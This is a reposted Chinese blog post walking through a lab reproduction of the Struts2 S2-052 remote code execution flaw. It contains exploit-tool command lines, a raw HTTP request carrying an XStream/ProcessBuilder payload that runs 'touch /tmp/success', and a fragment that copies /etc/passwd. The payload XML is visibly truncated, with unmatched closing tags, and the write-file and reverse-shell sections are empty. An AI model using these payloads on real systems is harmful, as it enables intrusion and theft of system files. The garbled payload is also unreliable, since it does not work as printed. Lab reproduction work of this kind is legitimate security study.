S2-052 漏洞复现-白红宇

S2-052 漏洞复现

阅读量：434 次

发布时间：2019-03-06

本文共 3039 字，大约阅读时间需要 10 分钟。

Structs2框架已知的漏洞编号如下：

S2-005

S2-009

S2-016 (含S2-013)

S2-019

S2-020

S2-021

S2-032

S2-037（含S2-033)

DevMode

S2-045

S2-046

S2-048

S2-052

S2-055

S2-057

S2-052（）环境：

访问 http://你的 IP 地址:端口号/

漏洞poc检测与利用

poc下载：

检测到漏洞存在：

python apache-struts-pwn.py -u 'http://192.168.190.135:8080/orders/3/edit'

漏洞利用写入文件

python apache-struts-pwn.py --exploit --url 'http://example.com/struts2-showcase/index.action' -c 'echo test > /tmp/apache-struts-pwn'

POST /orders/3 HTTP/1.1

Host: 192.168.190.135:8080

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/xml

Content-Length: 2415

Connection: close

Referer: http://192.168.190.135:8080/orders/3/edit

Cookie: JSESSIONID=8FCB55C3A30CB6059D3530A01C3E6FA0

Upgrade-Insecure-Requests: 1

DNT: 1

<map>

<entry>

<jdk.nashorn.internal.objects.NativeString>

<initialized>false</initialized>

<string>touch</string>

<string>/tmp/success</string>

</command>

<redirectErrorStream>false</redirectErrorStream>

</next>

</iter>

<class>java.lang.ProcessBuilder</class>

<name>start</name>

<parameter-types/>

</method>

</filter>

</serviceIterator>

<lock/>

</cipher>

<done>false</done>

<closed>false</closed>

</is>

<consumed>false</consumed>

</dataSource>

</dataHandler>

</value>

</jdk.nashorn.internal.objects.NativeString>

<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>

</entry>

<entry>

<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>

</entry>

</map>

以上数据包成功执行的话，会在docker容器内创建文件/tmp/success，

执行docker-compose exec struts2 ls /tmp/即可看到。

docker-compose exec struts2 ls /tmp/

读文件：

<command> <string>cp</string> <string>/etc/passwd</string> <string>/tmp/passwd</string> </command>

写文件：

</command>

反弹shell：

参考链接：

转载地址：http://rgqyz.baihongyu.com/

你可能感兴趣的文章

HTML基础，块级元素/行内元素/行内块元素辨析【2分钟掌握】

查看>>

23种设计模式一：单例模式

查看>>

spring启动错误：Could not resolve placeholder

查看>>

invalid byte sequence for encoding

查看>>

技术美术面试问题整理

查看>>

ORB-SLAM2：LoopClosing线程学习随笔【李哈哈：看看总有收获篇】

查看>>

Codeforces Round #305 (Div. 1) B. Mike and Feet（单调栈）

查看>>

js求阶乘

查看>>

Making the grade 和Sonya and Problem Wihtout a Legend

查看>>

python-day3 for语句完整使用

查看>>

基于LabVIEW的入门指南

查看>>

weblogic之cve-2015-4852

使用mybatis-generator生成底层

查看>>

Mybatis【5】-- Mybatis多种增删改查那些你会了么？